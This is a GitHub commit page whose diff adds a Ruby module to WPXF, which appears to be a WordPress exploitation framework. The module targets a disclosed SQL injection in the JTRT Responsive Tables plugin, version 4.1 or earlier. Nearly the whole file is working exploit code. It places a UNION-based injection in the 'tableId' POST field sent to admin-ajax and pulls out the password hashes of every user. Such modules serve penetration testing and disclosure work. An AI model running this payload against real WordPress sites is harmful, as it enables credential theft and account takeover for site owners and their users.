This repository was archived by the owner on Oct 22, 2020. It is now read-only.
File tree Expand file tree Collapse file tree 1 file changed +69
-0
lines changed
Expand file tree Collapse file tree 1 file changed +69
-0
lines changed Original file line number Diff line number Diff line change 1+ # frozen_string_literal: true
2+
3+ class Wpxf ::Auxiliary ::JtrtResponsiveTablesHashDump < Wpxf ::Module
4+ include Wpxf ::WordPress ::HashDump
5+
6+ def initialize
7+ super
8+
9+ update_info (
10+ name : 'JTRT Responsive Tables <= 4.1 Authenticated Hash Dump' ,
11+ desc : %(
12+ JTRT Responsive Tables <= 4.1 suffers from an SQL injection vulnerability
13+ which is exploitable by registered users of any level.
14+
15+ This module utilises the vulnerability to dump the hashed passwords
16+ of all users in the database.
17+ ) ,
18+ author : [
19+ 'Lenon Leite' , # Disclosure
20+ 'Rob Carr <rob[at]rastating.com>' # WPXF module
21+ ] ,
22+ references : [
23+ [ 'WPVDB' , '8953' ] ,
24+ [ 'URL' , 'http://lenonleite.com.br/en/blog/2017/09/11/jtrt-responsive-tables-wordpress-plugin-sql-injection/' ]
25+ ] ,
26+ date : 'Nov 11 2017'
27+ )
28+ end
29+
30+ def check
31+ check_plugin_version_from_readme ( 'jtrt-responsive-tables' , '4.1.1' )
32+ end
33+
34+ def requires_authentication
35+ true
36+ end
37+
38+ def reveals_one_row_per_request
39+ true
40+ end
41+
42+ def hashdump_request_method
43+ :post
44+ end
45+
46+ def hashdump_request_params
47+ {
48+ 'action' => 'get_old_table'
49+ }
50+ end
51+
52+ def hashdump_request_body
53+ {
54+ 'tableId' => "-#{ Utility ::Text . rand_numeric ( 2 ) } UNION #{ hashdump_sql_statement } #"
55+ }
56+ end
57+
58+ def hashdump_visible_field_index
59+ 2
60+ end
61+
62+ def hashdump_number_of_cols
63+ 5
64+ end
65+
66+ def vulnerable_url
67+ wordpress_url_admin_ajax
68+ end
69+ end
You can’t perform that action at this time.
0 commit comments